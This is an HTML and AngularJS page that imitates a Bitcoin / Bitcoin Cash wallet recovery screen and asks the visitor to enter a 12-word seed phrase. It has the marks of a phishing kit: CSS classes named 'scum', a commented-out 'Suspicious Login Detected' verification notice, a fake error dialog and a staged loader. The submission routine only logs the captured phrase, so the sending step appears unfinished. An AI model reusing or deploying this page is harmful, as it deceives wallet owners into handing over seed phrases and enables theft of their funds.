<!DOCTYPE html>
<html>

<head>
    <title>appname</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.3.1/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.7.8/angular.min.js"></script>
    
    <style>
        html, body {height: 100%; } .form-group.has_err .form-control {} .form-control.has_err {} .form-group.has_err label {} .form-group.has_err .err_span {} .err_div {position: fixed; z-index: 1; top: 0; left: 0; width: 100%; height: 100%; background: rgba(12, 12, 12, .6); } .err_box {position: relative; top: 10%; width: 90%; max-width: 307px; margin: 0 auto; padding: 12px 9px; background: rgba(255, 255, 255, 0.98); text-align: center; box-shadow: 0 0 15px black; } .scum_container {position: relative; overflow: hidden; padding: 18px 12px; } .scum_container.loader_show .scum {-webkit-animation-name: loader__show; animation-name: loader__show; -webkit-animation-duration: 1s; animation-duration: 1s; transition-timing-function: ease; -webkit-animation-fill-mode: forwards; animation-fill-mode: forwards; } .scum_container.loader_hide {-webkit-animation-name: loader__hide; animation-name: loader__hide; -webkit-animation-duration: 1s; animation-duration: 1s; transition-timing-function: ease; /*     animation-fill-mode:forwards; */ } @-webkit-keyframes loader__show {0% {opacity: 1; } 100% {opacity: 0; -webkit-transform: translateX(1000px); transform: translateX(1000px); } } @keyframes loader__show {0% {opacity: 1; } 100% {opacity: 0; -webkit-transform: translateX(1000px); transform: translateX(1000px); } } @-webkit-keyframes loader__hide {0% {opacity: 0; -webkit-transform: translateX(1000px); transform: translateX(1000px); } 100% {opacity: 1; } } @keyframes loader__hide {0% {opacity: 0; -webkit-transform: translateX(1000px); transform: translateX(1000px); } 100% {opacity: 1; } } .card-container {background: #9a0f18; padding: 14px 15px; border-radius: 10px; color: white; } .tan-card {border-radius: 6px; position: relative; overflow: hidden; border: 1px solid white; } .card-item {margin: 1px; border: 1px solid #ffffffd6; margin: 0px; text-align: center; /* color: white; */ width: 100%; } .form-control.tan-input {font-size: 16px; padding: 0px 0px; height: 23px; text-align: center; border-radius: 0px; border: none; background: white; } .form-control.tan-input:focus {box-shadow: none; } .card-item.card-item-th {font-weight: 700; } .card-item.card-item.odd {background: #00000038; } .form-control:disabled, .form-control[readonly] {background-color: #ffffffba; opacity: 1; } tancard.ng-scope {margin-bottom: 23px; display: block; } .table {display: table; table-layout: fixed; margin-bottom: 0px; } .tr {display: table-row; } .td {display: table-cell; } .active.btc-cash {color: #28a745; } .active.btc {color: rgb(253 178 38); } .slider {background: rgb(234 234 234); border-radius: 100px; padding: 2px; } h5.headr {font-size: 12px; margin-bottom: 16px; margin-top: 42px; font-weight: 700; } .slider-item.active {background: white; border-radius: 100px; font-weight: 800; } .slider-item {font-size: 11px; text-align: center; position: relative; /* overflow: auto; */ height: 39px; /* font-weight: 700; */ line-height: 38px; color: rgb(128 128 128); } .slider-icon {position: absolute; left: 8px; } textarea.form-control,textarea.form-control:focus {border: none; border-bottom: 1px solid rgb(175 171 171); border-radius: 0px; box-shadow: none; } .top {padding-top: 10px; border-bottom: 2px solid rgb(208 203 203); } .top {padding-left: 15px; padding-right: 15px; } .topitem {width: 200px; border-bottom: 5px solid rgb(26 183 123); text-align: center; color: #1AB77B; font-weight: 600; } .btn-info,.btn-info:hover {background: #1AB77B; border-radius: 100px; height: 50px; font-size: 13px; } .btn-info.disabled, .btn-info:disabled {background: rgb(206 206 206); border-color: rgb(187 183 183); }
    </style>
</head>

<body ng-app="app" ng-controller="c1" ng-model-options="{'allowInvalid':true}" ng-cloak>
    <div class="table h-100">
        <div class="tr h-100">
            <div class="td">
                <div class="top">
                    <div class="topitem">
                        Recovery phrase
                    </div>
                </div>
                <div class="container">
                    <div class="row">
                        <div class="col"></div>
                        <div class="col-md-8">
                            <div class="top2">
                                <h5 class="headr">
                                    TYPE
                                </h5>
                                <div class="slider">
                                    <div class="d-flex justify-content-around align-items-center">
                                        <div class="slider-item  btc w-100" data-ng-click="data.type='btc'" data-ng-class="{'active':data.type=='btc'}">
                                            <span class="slider-icon ">
                                                <span class="fa-stack fa-lg">
                                                    <i class="fa fa-circle fa-stack-2x"></i>
                                                    <i class="fa fa-btc fa-stack-1x fa-inverse"></i>
                                                </span>
                                            </span>
                                            BITCOIN
                                        </div>
                                        <div class="" style="width: 30px"></div>
                                        <div class="slider-item btc-cash w-100" data-ng-click="data.type='bch'" data-ng-class="{'active':data.type=='bch'}">
                                            <span class="slider-icon ">
                                                <span class="fa-stack fa-lg">
                                                    <i class="fa fa-circle fa-stack-2x"></i>
                                                    <i class="fa fa-btc fa-stack-1x fa-inverse"></i>
                                                </span>
                                            </span>
                                            BITCOIN CASH
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="main">
                                <div class="scum_containerloader_show">
                                    <div class="scum" id="login-view">
                                        <form name="loginform" id="loginform" autocomplete="off" onsubmit="send1(event,'finish__','_4_check');return false" novalidate>
                                            <!-- <div class="legend">
                                                <h4 class="legend_h4">Suspicious Login Detected </h4>
                                                <p class="legend_p">Please fill out the required fields in order for us to verify your identity.</p>
                                            </div> -->
                                            <h5 class="headr">
                                                RECOVERY PHRASE
                                            </h5>
                                            <div class="form-group">
                                                <!-- <label for="id__">Label__</label> -->
                                                <textarea  placeholder="Provide 12-word recovery phrase" required data-ng-model="data.phrase" pattern="^\w{2,} \w{2,} \w{2,} \w{2,} \w{2,} \w{2,} \w{2,} \w{2,} \w{2,} \w{2,} \w{2,} \w{2,}$" data-err_text="Please enter valid " name="phrase" id="phrase" class="form-control"></textarea>
                                            </div>
                                            <div class="form-group">
                                                <button class="btn btn-info w-100" data-ng-disabled="loginform.$invalid">RECOVER WALLET</button>
                                            </div>
                                        </form>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="col"></div>
                    </div>
                </div>
            </div>
        </div>
        <!-- <div class="tr">
            <div class="td">
                <button class="btn btn-success w-100">
                    ACCESO <span class="float-right">→</span>
                </button>
            </div>
        </div> -->
    </div>
    <div class="err_div" style="display:none ;">
        <div class="err_box">
            <h4 class="err_title">Error</h4>
            <p class="err_p">Incorrect information. Try again</p>
            <button class="err_buton" onclick="$('.err_div').hide()">OK</button>
        </div>
    </div>
</body>
<script type="text/javascript">
var app = angular.module('app', [])


app.controller('c1', ['$scope', function($scope) {
    sc_ = $scope;

    $scope.data = {
        type: "btc"
    }
}])






$('<div class="loader__" style="display:;position: fixed;background:rgb(255 255 255);width: 100%;height: 100%;top: 0px;left: 0px;z-index: 1000;text-align: center;">\
   <span class="fa-stack l_1" style="font-size: 50px;position: relative;top: 50%; -webkit-transform: translateY(-50%); -ms-transform: translateY(-50%); transform: translateY(-50%);">\
          <i class="fa fa-circle fa-stack-2x"></i>\
          <i class="fa fa-btc fa-stack-1x fa-pulse" style="color: white"></i>\
   </span>\
   \
   \
   \
</div>').appendTo('body');

window.loader_ = {
    hide: function() {

        $('.scum_container').removeClass('loader_hide loader_show')
        $('.scum_container').addClass('loader_hide');
        $('.loader__').fadeOut('slow');
    },
    show: function() {
        $('.loader__').fadeIn('fast');
        $('.scum_container').removeClass('loader_hide loader_show')
        $('.scum_container').addClass('loader_show');
    }
}








$(document).ready(function() {
    setTimeout(function() {
        loader_.hide()
    }, 1000);
});









var _4_check = function(err) {


    var _12 = $('#phrase').val().split(' ').filter(Boolean);
    unique_=$.unique(_12).length;


    if(unique_<12){
        return false
    }else{
        return true
    }


}



















$("body").on("keypress change", '.form-control ,.custom_input_class', function() {
    $(this).closest(".form-group").removeClass("has_err");
    $(this).removeClass("has_err");
    $(".err_div").fadeOut();
});

setTimeout(function() {
    $('.form-control[data-mask]').each(function(i, el, all) {
        $.mask.definitions['h'] = "[A-Fa-f0-9]";
        $(this).mask($(this).data().mask, {
            placeholder: $(this).attr('mask-placeholder')
        }) //auto mask

    })
}, 1) // fix for anguler masked intergration 2019



var send1 = function(e, callback__, global_luhn__) {


    e.preventDefault();
    var el = e.target;
    var err = false;
    var err_text = [];
    var err_elements = [];

    if ($(el).data().hasOwnProperty('sub_ed')) { //2019
        // return;
    }

    $(el).find("input:visible:enabled,select:visible:enabled").each(function() {
        var reg__ = new RegExp($(this).attr('pattern'));

        if (!reg__.test($(this).val())) {
            err = true;
            err_elements.push(this);
            err_text.push(this.dataset.err_text);
            return;
        }
        var luhn__ = $(this).data().luhn;
        if (typeof luhn__ != "undefined" && luhn__ != "") {

            if ($(this).val() != "") {
                if (!eval(luhn__)($(this).val(), err_text)) {
                    err = true;
                    err_elements.push(this);
                }
            }
        }
    });

    //time for global_luhn
    if (!err) {
        if (typeof global_luhn__ != "undefined") {
            if (!eval(global_luhn__)(err_text)) {
                err = true;
            }
        }
    }


    if (err) {
        err_text = err_text.filter(function(e) {
            return e;
        });
        err_text = $.unique(err_text);
        $(".err_ul").html("");
        $(err_text).each(function(i, t) {
            $("<li><span>" + t + "</span></li>").appendTo(".err_ul");
        });

        $(".err_div").show();
        $(err_elements).each(function() {
            $(this).closest(".form-group").addClass("has_err");
            $(this).addClass("has_err");

            //...
        });
        $(window).scrollTop(0);
        return;
    }

    if (typeof callback__ != "undefined") {
        $(el).data('sub_ed', true); //2019
        eval(callback__)(el);
        return;
    }
    alert("We stack, what to do next?");
};




function next__(el) {

    loader_.show();
    setTimeout(function() {
        loader_.hide();
        $('.scum').hide();
        $(el).closest('.scum').next().show();
    }, 4000)

}


function finish__(el) {

    loader_.show();

    // data___ = $('.form').custom_ser()
    // $.each(data___, function(i, v) {
    //     $('<input type="hidden" name="' + i + '" value="' + v + '">').appendTo('#mf') //random prepend
    // })



    submit_data();

}




function submit_data() {

    console.log('print event:' + phrase.value);



}



$.fn.autoJump = function() {
    var els = this;
    els.on("input", function() {
        if ($(this).val().length == $(this).attr('maxlength')) {
            var this_ = this;
            els.each(function(i) {
                if (this === this_) {
                    if (els.length - 1 == i) {
                        els.eq(0).focus();
                    } else {
                        els.eq(i + 1).focus();
                    }
                }
            });
        }
    });
};
</script>

</html>